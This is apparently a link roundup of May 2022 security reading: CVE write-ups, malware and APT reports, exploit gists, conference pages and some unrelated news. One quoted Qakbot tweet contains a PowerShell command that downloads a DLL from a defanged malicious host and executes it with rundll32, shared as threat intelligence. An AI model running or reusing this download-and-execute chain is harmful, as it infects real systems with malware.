DEA Investigating Breach of Law Enforcement Data Portal – Krebs on Security
https://krebsonsecurity.com/2022/05/dea-investigating-breach-of-law-enforcement-data-portal/
CVE-2022-21972: Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 1) - Nettitude Labs
https://labs.nettitude.com/blog/cve-2022-21972-windows-server-vpn-remote-kernel-use-after-free-vulnerability/
404 Page not found | STAR Labs
https://starlabs.sg/blog/2022/05/new-wine-in-old-bottle-microsoft-sharepoint-post-auth-deserialization-rce-cve-2022-29108/
Cyber Security Training Events | SANS Institute
http://www.sans.org/u/1kWK
BPFDoor: Stealthy Linux malware bypasses firewalls for remote access
https://www.bleepingcomputer.com/news/security/bpfdoor-stealthy-linux-malware-bypasses-firewalls-for-remote-access/
bloodyAD and CVE-2022-26923 | Total Recall
https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html
CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection | Rapid7 Blog
https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923) · GitHub
https://gist.github.com/dmchell/478d83f369260bd4e4cd380712f6bb6e
How to Write YARA Rules That Minimize False Positives - Intezer
https://www.intezer.com/blog/threat-hunting/yara-rules-minimize-false-positives/
MalwareHunterTeam on Twitter: "There is a new version of WCry/WannaCry ransomware: "WanaCrypt0r 2.0". Extension: .WNCRY Note: @[email protected] @BleepinComputer https://t.co/tdq0OBScz4" / Twitter
https://twitter.com/malwrhunterteam/status/862946459376857088
Call For Papers - Wild West Hackin' Fest in Deadwood
https://wildwesthackinfest.com/deadwood/cfp/
3xp0rt on Twitter: "#Malware #Yashma #Ransomware A paid version of Chaos Ransomware yashma-encrypt.exe: https://t.co/eOTUzf3GqE https://t.co/2FafHpt3RZ read_it.txt: https://t.co/kKxDK0UFs5 BTC address: bc1qlnzcep4l4ac0ttdrq7awxev9ehu465f2vpt9x0 https://t.co/5QWUzkbeBt" / Twitter
https://twitter.com/3xp0rtblog/status/1517572032963174401
APT34 targets Jordan Government using new Saitama backdoor
https://blog.malwarebytes.com/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor/
iPhone Setup for Reversing and Debugging
https://naehrdine.blogspot.com/2022/05/iphone-setup-for-reversing-and-debugging.html
Rural Tech Fund on Twitter: "“The Cuckoo’s Egg: Tracking a Spy Through the Maze of Computer Espionage” by Clifford Stoll is a nonfiction masterpiece. The story is a first-person account of searching for a hacker while Stoll was working at the Lawrence Berkeley National Laboratory. After noticing a 75-cent 1/ https://t.co/Dd4j7Z7CYF" / Twitter
https://twitter.com/RuralTechFund/status/1524404922820792320
Where To Find Us | SpecterOps
https://ghst.ly/3vl6xtH
CVE-2022-23270 - Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 2) - Nettitude Labs
https://labs.nettitude.com/blog/cve-2022-23270-windows-server-vpn-remote-kernel-use-after-free-vulnerability/
REcon on Twitter: "Recon 2022 Talk selection have been released. https://t.co/WxAPSuMXrH. Talk description and schedules will be published soon." / Twitter
https://twitter.com/reconmtl/status/1524823185102974978
Rasta Mouse on Twitter: "BlockDLLs and PPID Spoof working with @CaptMeelo's NtCreateUserProcess code. Thanks @passthehashbrwn for the tips. https://t.co/dxYbh9WPsf" / Twitter
https://twitter.com/_RastaMouse/status/1524761507782873088
PPID Spoofing & BlockDLLs with NtCreateUserProcess - Offensive Defence
https://offensivedefence.co.uk/posts/ntcreateuserprocess/
‘I lost my life savings’: Terra Luna cryptocurrency collapses 98% overnight | The Independent
https://www.independent.co.uk/tech/terra-luna-ust-crypto-price-crash-b2076655.html
MalwareBazaar | SHA256 df0d696632c25d7dc0f18b43ee985e7e4b4b7b7efb79ea0672d07e581c9bd561 (BumbleBee)
https://bazaar.abuse.ch/sample/df0d696632c25d7dc0f18b43ee985e7e4b4b7b7efb79ea0672d07e581c9bd561/
Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: Bitter APT adds Bangladesh to their targets
https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html
Joint statement by the President of the Republic and Prime Minister of Finland on Finland's NATO membership - Presidentti
https://www.presidentti.fi/en/press-release/joint-statement-by-the-president-of-the-republic-and-prime-minister-of-finland-on-finlands-nato-membership/
proxylife on Twitter: "#Qakbot - AA - url > .zip > .lnk > .ps > .dll powershell.exe Invoke-WebRequest hxxps://penofpurpose.com/7FSBEwva7VvZ/y.png -OutFile c:\file140.dll;Start-Process rundll32 c:\file140.dll,DllInstall https://t.co/JyocB7ljRs IOC's https://t.co/zpuFMjgbEv https://t.co/G6ScRvwyxG" / Twitter
https://twitter.com/pr0xylife/status/1524771398975213568
Coinbase admits users may lose crypto if exchange goes bankrupt | Fortune
https://fortune.com/2022/05/11/coinbase-bankruptcy-crypto-assets-safe-private-key-earnings-stock/
SEKTOR7 Institute
https://institute.sektor7.net/?coupon=ICE-SAINTS-19H
Nobel Peace Prize-Nom Entertainer Cynthia Basinet Highlights Big Tech & Big Media Abuse To The UN - YouTube
https://youtu.be/IUqg9SMWIxA
GitHub - warhorse/warhorse
https://github.com/warhorse/warhorse
CVE-2022-0573: Artifactory Vulnerable to Deserialization of Untrusted Data - JFrog - JFrog Documentation
https://www.jfrog.com/confluence/display/JFROG/CVE-2022-0573%3A+Artifactory+Vulnerable+to+Deserialization+of+Untrusted+Data
𓃭𓇋𓊃𓄿𓁐 on Twitter: "it is with a heavy heart that i must inform you it is once again time to update your threat model: https://t.co/b8t68med0w" / Twitter
https://twitter.com/mycoliza/status/1524507221618425856
GitHub - NVIDIA/open-gpu-kernel-modules: NVIDIA Linux open GPU kernel module source
https://github.com/NVIDIA/open-gpu-kernel-modules
#1350653 Remote kernel heap overflow
https://hackerone.com/reports/1350653